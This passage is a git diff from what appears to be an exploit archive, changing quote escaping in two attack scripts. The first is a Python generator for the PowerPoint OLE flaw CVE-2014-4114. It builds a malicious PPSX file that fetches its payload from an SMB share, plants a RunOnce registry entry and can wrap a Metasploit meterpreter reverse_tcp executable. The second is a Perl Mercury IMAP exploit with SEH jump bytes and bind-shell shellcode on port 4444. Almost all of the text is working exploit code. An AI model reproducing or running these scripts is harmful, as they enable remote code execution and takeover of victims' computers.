-    xml = xml + \'<p:sld xmlns:a=\"http://schemas.openxmlformats.org/drawingml/2006/main\" xmlns:r=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships\" xmlns:p=\"http://schemas.openxmlformats.org/presentationml/2006/main\"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id=\"1\" name=\"\"/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x=\"0\" y=\"0\"/><a:ext cx=\"0\" cy=\"0\"/><a:chOff x=\"0\" y=\"0\"/><a:chExt cx=\"0\" cy=\"0\"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id=\"4\" name=\"Object 3\"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect=\"1\"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x=\"1270000\" y=\"-1270000\"/><a:ext cx=\"381000\" cy=\"381000\"/></p:xfrm><a:graphic><a:graphicData uri=\"http://schemas.openxmlformats.org/presentationml/2006/ole\"><p:oleObj spid=\"_x0000_s1026\" name=\"Packager Shell Object\" r:id=\"rId3\" imgW=\"850320\" imgH=\"686880\" progId=\"\"><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id=\"5\" name=\"Object 4\"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect=\"1\"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x=\"1905000\" y=\"-1270000\"/><a:ext cx=\"381000\" cy=\"381000\"/></p:xfrm><a:graphic><a:graphicData uri=\"http://schemas.openxmlformats.org/presentationml/2006/ole\"><p:oleObj spid=\"_x0000_s1027\" name=\"Packager Shell Object\" r:id=\"rId4\" imgW=\"850320\" imgH=\"686880\" progId=\"\"><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id=\"1\" dur=\"indefinite\" restart=\"never\" nodeType=\"tmRoot\"><p:childTnLst><p:seq concurrent=\"1\" nextAc=\"seek\"><p:cTn id=\"2\" dur=\"indefinite\" nodeType=\"mainSeq\"><p:childTnLst><p:par><p:cTn id=\"3\" fill=\"hold\"><p:stCondLst><p:cond delay=\"indefinite\"/><p:cond evt=\"onBegin\" delay=\"0\"><p:tn val=\"2\"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"4\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"5\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"withEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"6\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id=\"7\" fill=\"hold\"><p:stCondLst><p:cond delay=\"1000\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"8\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"afterEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"9\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set><p:cmd type=\"verb\" cmd=\"-3\"><p:cBhvr><p:cTn id=\"10\" dur=\"1000\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"4\"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id=\"11\" fill=\"hold\"><p:stCondLst><p:cond delay=\"2000\"/></p:stCondLst><p:childTnLst><p:par><p:cTn id=\"12\" presetID=\"11\" presetClass=\"entr\" presetSubtype=\"0\" fill=\"hold\" nodeType=\"afterEffect\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id=\"13\" dur=\"1000\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"5\"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val=\"visible\"/></p:to></p:set><p:cmd type=\"verb\" cmd=\"3\"><p:cBhvr><p:cTn id=\"14\" dur=\"1000\" fill=\"hold\"><p:stCondLst><p:cond delay=\"0\"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid=\"5\"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt=\"onPrev\" delay=\"0\"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt=\"onNext\" delay=\"0\"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>\'
+    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
+    xml = xml + '<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main"><p:cSld><p:spTree><p:nvGrpSpPr><p:cNvPr id="1" name=""/><p:cNvGrpSpPr/><p:nvPr/></p:nvGrpSpPr><p:grpSpPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="0" cy="0"/><a:chOff x="0" y="0"/><a:chExt cx="0" cy="0"/></a:xfrm></p:grpSpPr><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="4" name="Object 3"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1270000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1026" name="Packager Shell Object" r:id="rId3" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame><p:graphicFrame><p:nvGraphicFramePr><p:cNvPr id="5" name="Object 4"/><p:cNvGraphicFramePr><a:graphicFrameLocks noChangeAspect="1"/></p:cNvGraphicFramePr><p:nvPr/></p:nvGraphicFramePr><p:xfrm><a:off x="1905000" y="-1270000"/><a:ext cx="381000" cy="381000"/></p:xfrm><a:graphic><a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole"><p:oleObj spid="_x0000_s1027" name="Packager Shell Object" r:id="rId4" imgW="850320" imgH="686880" progId=""><p:embed/></p:oleObj></a:graphicData></a:graphic></p:graphicFrame></p:spTree></p:cSld><p:clrMapOvr><a:masterClrMapping/></p:clrMapOvr><p:transition><p:zoom/></p:transition><p:timing><p:tnLst><p:par><p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"><p:childTnLst><p:seq concurrent="1" nextAc="seek"><p:cTn id="2" dur="indefinite" nodeType="mainSeq"><p:childTnLst><p:par><p:cTn id="3" fill="hold"><p:stCondLst><p:cond delay="indefinite"/><p:cond evt="onBegin" delay="0"><p:tn val="2"/></p:cond></p:stCondLst><p:childTnLst><p:par><p:cTn id="4" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="5" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="6" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="7" fill="hold"><p:stCondLst><p:cond delay="1000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="8" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="9" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="-3"><p:cBhvr><p:cTn id="10" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="4"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par><p:par><p:cTn id="11" fill="hold"><p:stCondLst><p:cond delay="2000"/></p:stCondLst><p:childTnLst><p:par><p:cTn id="12" presetID="11" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect"><p:stCondLst><p:cond delay="0"/></p:stCondLst><p:childTnLst><p:set><p:cBhvr><p:cTn id="13" dur="1000"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl><p:attrNameLst><p:attrName>style.visibility</p:attrName></p:attrNameLst></p:cBhvr><p:to><p:strVal val="visible"/></p:to></p:set><p:cmd type="verb" cmd="3"><p:cBhvr><p:cTn id="14" dur="1000" fill="hold"><p:stCondLst><p:cond delay="0"/></p:stCondLst></p:cTn><p:tgtEl><p:spTgt spid="5"/></p:tgtEl></p:cBhvr></p:cmd></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn></p:par></p:childTnLst></p:cTn><p:prevCondLst><p:cond evt="onPrev" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:prevCondLst><p:nextCondLst><p:cond evt="onNext" delay="0"><p:tgtEl><p:sldTgt/></p:tgtEl></p:cond></p:nextCondLst></p:seq></p:childTnLst></p:cTn></p:par></p:tnLst></p:timing></p:sld>'
     return xml
 
 # build [Content_Types].xml	
 def build_xml_content_types():
-    xml = \'<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\'
-    xml = xml + \'<Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"><Default Extension=\"xml\" ContentType=\"application/xml\"/><Default Extension=\"jpeg\" ContentType=\"image/jpeg\"/><Default Extension=\"bin\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.printerSettings\"/><Default Extension=\"vml\" ContentType=\"application/vnd.openxmlformats-officedocument.vmlDrawing\"/><Default Extension=\"rels\" ContentType=\"application/vnd.openxmlformats-package.relationships+xml\"/><Default Extension=\"wmf\" ContentType=\"image/x-wmf\"/><Override PartName=\"/ppt/presentation.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml\"/><Override PartName=\"/ppt/slideMasters/slideMaster1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml\"/><Override PartName=\"/ppt/slides/slide1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slide+xml\"/><Override PartName=\"/ppt/presProps.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.presProps+xml\"/><Override PartName=\"/ppt/viewProps.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml\"/><Override PartName=\"/ppt/theme/theme1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.theme+xml\"/><Override PartName=\"/ppt/tableStyles.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout1.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout2.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout3.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout4.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout5.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout6.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout7.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout8.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout9.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout10.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/slideLayouts/slideLayout11.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml\"/><Override PartName=\"/ppt/embeddings/oleObject1.bin\" ContentType=\"application/vnd.openxmlformats-officedocument.oleObject\"/><Override PartName=\"/ppt/embeddings/oleObject2.bin\" ContentType=\"application/vnd.openxmlformats-officedocument.oleObject\"/><Override PartName=\"/docProps/core.xml\" ContentType=\"application/vnd.openxmlformats-package.core-properties+xml\"/><Override PartName=\"/docProps/app.xml\" ContentType=\"application/vnd.openxmlformats-officedocument.extended-properties+xml\"/></Types>\'
+    xml = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
+    xml = xml + '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="jpeg" ContentType="image/jpeg"/><Default Extension="bin" ContentType="application/vnd.openxmlformats-officedocument.presentationml.printerSettings"/><Default Extension="vml" ContentType="application/vnd.openxmlformats-officedocument.vmlDrawing"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="wmf" ContentType="image/x-wmf"/><Override PartName="/ppt/presentation.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideshow.main+xml"/><Override PartName="/ppt/slideMasters/slideMaster1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideMaster+xml"/><Override PartName="/ppt/slides/slide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/><Override PartName="/ppt/presProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.presProps+xml"/><Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/><Override PartName="/ppt/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/ppt/tableStyles.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tableStyles+xml"/><Override PartName="/ppt/slideLayouts/slideLayout1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout4.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout5.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout8.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout10.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/slideLayouts/slideLayout11.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/><Override PartName="/ppt/embeddings/oleObject1.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/ppt/embeddings/oleObject2.bin" ContentType="application/vnd.openxmlformats-officedocument.oleObject"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/></Types>'
  
     return xml
 	
 # build remotely hosted inf file 
 def build_inf(gif):
-    exe = gif.split(\'.\')[0] + \'.exe\'
-    inf = \'[Version]\\n\'
-    inf = inf + \'Signature = \"$CHICAGO$\"\\n\'
-    inf = inf + \'Class=61883\\n\'
-    inf = inf + \'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\\n\'
-    inf = inf + \'Provider=%Microsoft%\\n\'
-    inf = inf + \'DriverVer=06/21/2006,6.1.7600.16385\\n\'
-    inf = inf + \'[DestinationDirs]\\n\'
-    inf = inf + \'DefaultDestDir = 1\\n\'
-    inf = inf + \'[DefaultInstall]\\n\'
-    inf = inf + \'RenFiles = RxRename\\n\'
-    inf = inf + \'AddReg = RxStart\\n\'
-    inf = inf + \'[RxRename]\\n\'
-    inf = inf + exe + \', \' + gif + \'\\n\'
-    inf = inf + \'[RxStart]\\n\'
-    inf = inf + \'HKLM,Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce,Install,,%1%\\\\\' + exe
+    exe = gif.split('.')[0] + '.exe'
+    inf = '[Version]\n'
+    inf = inf + 'Signature = "$CHICAGO$"\n'
+    inf = inf + 'Class=61883\n'
+    inf = inf + 'ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}\n'
+    inf = inf + 'Provider=%Microsoft%\n'
+    inf = inf + 'DriverVer=06/21/2006,6.1.7600.16385\n'
+    inf = inf + '[DestinationDirs]\n'
+    inf = inf + 'DefaultDestDir = 1\n'
+    inf = inf + '[DefaultInstall]\n'
+    inf = inf + 'RenFiles = RxRename\n'
+    inf = inf + 'AddReg = RxStart\n'
+    inf = inf + '[RxRename]\n'
+    inf = inf + exe + ', ' + gif + '\n'
+    inf = inf + '[RxStart]\n'
+    inf = inf + 'HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,%1%\\' + exe
  
     return inf
 
@@ -148,10 +148,10 @@ def build_presentation(filename):
 
 # build metasploit meterpreter reverse_tcp payload	
 def build_msfpayload(ip, port, file):
-    cmd = \'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s\' % (ip, port, file)
+    cmd = 'msfpayload windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s' % (ip, port, file)
     run_cmd= subprocess.check_output(cmd, shell=True)
     subprocess.call(run_cmd, shell=True)
-    print \'[*] Meterpreter Reverse TCP EXE [%s] created.\' % (file)
+    print '[*] Meterpreter Reverse TCP EXE [%s] created.' % (file)
  
     
 #################################################
@@ -160,33 +160,33 @@ def build_msfpayload(ip, port, file):
  
 def main():
     print
-    print \'=============================================================================\'
-    print \'|    PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114)        |\'
-    print \'|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |\' 
-    print \'=============================================================================\\n\'
+    print '============================================================================='
+    print '|    PowerPoint OLE Remote Code Execution (MS14-060 | CVE-2014-4114)        |'
+    print '|               Author: Mike Czumak (T_v3rn1x) - @SecuritySift              |' 
+    print '=============================================================================\n'
 	
     args = get_args() # get the cl args 
     ip = args.ip 
-    share = \"share\"
-    ole1 = \"oleObject1.bin\"
-    ole2 = \"oleObject2.bin\"
-    vml = \"vmlDrawing1.vml\"
-    pptx = \"tmp.pptx\"
-    gif = \"slide1.gif\"
-    inf = \"slides.inf\"
+    share = "share"
+    ole1 = "oleObject1.bin"
+    ole2 = "oleObject2.bin"
+    vml = "vmlDrawing1.vml"
+    pptx = "tmp.pptx"
+    gif = "slide1.gif"
+    inf = "slides.inf"
     
     # build meterpreter reverse tcp gif file (optional)
     if args.msf:
-        print \"[i] Building metasploit reverse_tcp executable\"
+        print "[i] Building metasploit reverse_tcp executable"
         build_msfpayload(args.ip, args.msf, gif)
  
     # build the bin, inf and vml files
-    gif_bin = build_bin(\"EmbeddedStg1.txt\", ip, share, gif)
-    inf_bin = build_bin(\"EmbeddedStg2.txt\", ip, share, inf)
+    gif_bin = build_bin("EmbeddedStg1.txt", ip, share, gif)
+    inf_bin = build_bin("EmbeddedStg2.txt", ip, share, inf)
     draw_vml = build_vml()
     rem_inf = build_inf(gif)
     write_file(inf, rem_inf)
-    print (\"[*] INF file [%s] created \" % inf)
+    print ("[*] INF file [%s] created " % inf)
  
     # build the xml files
     xml_rel = build_xml_rels(ole1, ole2)
@@ -195,29 +195,29 @@ def main():
  
     # build blank temp pptx presentation to convert to ppsx
     build_presentation(pptx)
-    zippptx = pptx + \".zip\"
+    zippptx = pptx + ".zip"
     os.rename(pptx, zippptx) # rename to zip for modification
     
     # open temp pptx and a copy for modification
-    zin = zipfile.ZipFile(zippptx, \'r\')
-    zippptx_copy = \"copy_\" + zippptx
-    zout = zipfile.ZipFile(zippptx_copy, \"w\")
+    zin = zipfile.ZipFile(zippptx, 'r')
+    zippptx_copy = "copy_" + zippptx
+    zout = zipfile.ZipFile(zippptx_copy, "w")
  
     # modify the pptx template with exploit
     for item in zin.infolist():
-        if (item.filename == \"ppt/slides/slide1.xml\"): 
+        if (item.filename == "ppt/slides/slide1.xml"): 
             zout.writestr(item, xml_slide1) # replace slide 1 contents
-        elif (item.filename == \"ppt/slides/_rels/slide1.xml.rels\"):
+        elif (item.filename == "ppt/slides/_rels/slide1.xml.rels"):
             zout.writestr(item, xml_rel) # replace slide 1 rels
-        elif (item.filename == \"[Content_Types].xml\"):
+        elif (item.filename == "[Content_Types].xml"):
             zout.writestr(item, xml_content) # replace content_types
         else:
             buffer = zin.read(item.filename) 
             zout.writestr(item,buffer) # use existing file
     
-    zout.writestr(\"ppt/embeddings/\" + ole1, gif_bin)
-    zout.writestr(\"ppt/embeddings/\"+ole2, inf_bin)
-    zout.writestr(\"ppt/drawings/vmlDrawing1.vml\", draw_vml)
+    zout.writestr("ppt/embeddings/" + ole1, gif_bin)
+    zout.writestr("ppt/embeddings/"+ole2, inf_bin)
+    zout.writestr("ppt/drawings/vmlDrawing1.vml", draw_vml)
     zout.close()
     zin.close()
     
@@ -225,9 +225,9 @@ def main():
     os.rename(zippptx_copy, args.filename)
     os.remove(zippptx)
     
-    print (\"[*] Exploit PPSX file [%s] created\" % (args.filename))		
-    print (\"[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called \'share\'\" % (gif))		
+    print ("[*] Exploit PPSX file [%s] created" % (args.filename))		
+    print ("[i] Place INF and GIF (EXE) payload file (called %s) in an SMB share called 'share'" % (gif))		
     print
  
-if __name__ == \'__main__\':
+if __name__ == '__main__':
 	main()
\ No newline at end of file
diff --git a/platforms/windows/remote/3561.pl b/platforms/windows/remote/3561.pl
index 1b86bedea..1e22b135f 100755
--- a/platforms/windows/remote/3561.pl
+++ b/platforms/windows/remote/3561.pl
@@ -9,16 +9,16 @@ use IO::Socket::INET;
 use Switch;
 
 if (@ARGV < 3) {
-print \"--------------------------------------------------------------------\\n\";
-print \"Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\\n\";
-print \" Return address: \\n\";
-print \" 1 - Windows 2k Sp4 English Version\\n\";
-print \" 2 - Windows 2k Sp4 Italian Version\\n\";
-print \" 3 - Windows XP Sp1 English Version\\n\";
-print \" 4 - Windows XP Sp0 English Version\\n\";
-print \" If values not specified, Windows 2k Sp4 will be used.\\n\";
-print \" Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\\n\";
-print \"--------------------------------------------------------------------\\n\";
+print "--------------------------------------------------------------------\n";
+print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
+print " Return address: \n";
+print " 1 - Windows 2k Sp4 English Version\n";
+print " 2 - Windows 2k Sp4 Italian Version\n";
+print " 3 - Windows XP Sp1 English Version\n";
+print " 4 - Windows XP Sp0 English Version\n";
+print " If values not specified, Windows 2k Sp4 will be used.\n";
+print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
+print "--------------------------------------------------------------------\n";
 }
 
 use IO::Socket::INET;
@@ -27,9 +27,9 @@ my $host = 10.0.0.2;
 my $port = 143;
 my $reply;
 my $request;
-my $jmp=\"\\xe9\\x02\\xff\\xff\\xff\";
+my $jmp="\xe9\x02\xff\xff\xff";
 
-my $nextseh = \"\\x90\\x90\\xeb\\x09\";
+my $nextseh = "\x90\x90\xeb\x09";
 
 
 
@@ -37,19 +37,19 @@ my $nextseh = \"\\x90\\x90\\xeb\\x09\";
 #1)bind port, in this exploit is 4444 in the original shellcode was 6666
 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
 my $shellcode = 
-\"\\x59\\x81\\xc9\\xd3\\x62\\x30\\x20\\x41\\x43\\x4d\\x64\".
-\"\\x64\\x99\\x96\\x8D\\x7E\\xE8\\x64\\x8B\\x5A\\x30\\x8B\\x4B\\x0C\\x8B\\x49\\x1C\".
-\"\\x8B\\x09\\x8B\\x69\\x08\\xB6\\x03\\x2B\\xE2\\x66\\xBA\\x33\\x32\\x52\\x68\\x77\".
-\"\\x73\\x32\\x5F\\x54\\xAC\\x3C\\xD3\\x75\\x06\\x95\\xFF\\x57\\xF4\\x95\\x57\\x60\".
-\"\\x8B\\x45\\x3C\\x8B\\x4C\\x05\\x78\\x03\\xCD\\x8B\\x59\\x20\\x03\\xDD\\x33\\xFF\".
-\"\\x47\\x8B\\x34\\xBB\\x03\\xF5\\x99\\xAC\\x34\\x71\\x2A\\xD0\\x3C\\x71\\x75\\xF7\".
-\"\\x3A\\x54\\x24\\x1C\\x75\\xEA\\x8B\\x59\\x24\\x03\\xDD\\x66\\x8B\\x3C\\x7B\\x8B\".
-\"\\x59\\x1C\\x03\\xDD\\x03\\x2C\\xBB\\x95\\x5F\\xAB\\x57\\x61\\x3B\\xF7\\x75\\xB4\".
-\"\\x5E\\x54\\x6A\\x02\\xAD\\xFF\\xD0\\x88\\x46\\x13\\x8D\\x48\\x30\\x8B\\xFC\\xF3\".
-\"\\xAB\\x40\\x50\\x40\\x50\\xAD\\xFF\\xD0\\x95\\xB8\\x02\\xFF\\x11\\x5c\\x32\\xE4\".
-\"\\x50\\x54\\x55\\xAD\\xFF\\xD0\\x85\\xC0\\x74\\xF8\\xFE\\x44\\x24\\x2D\\xFE\\x44\".
-\"\\x24\\x2c\\x83\\xEF\\x6C\\xAB\\xAB\\xAB\\x58\\x54\\x54\\x50\\x50\\x50\\x54\\x50\".
-\"\\x50\\x56\\x50\\xFF\\x56\\xE4\\xFF\\x56\\xE8\";
+"\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64".
+"\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C".
+"\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77".
+"\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60".
+"\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF".
+"\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7".
+"\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B".
+"\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4".
+"\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3".
+"\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4".
+"\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44".
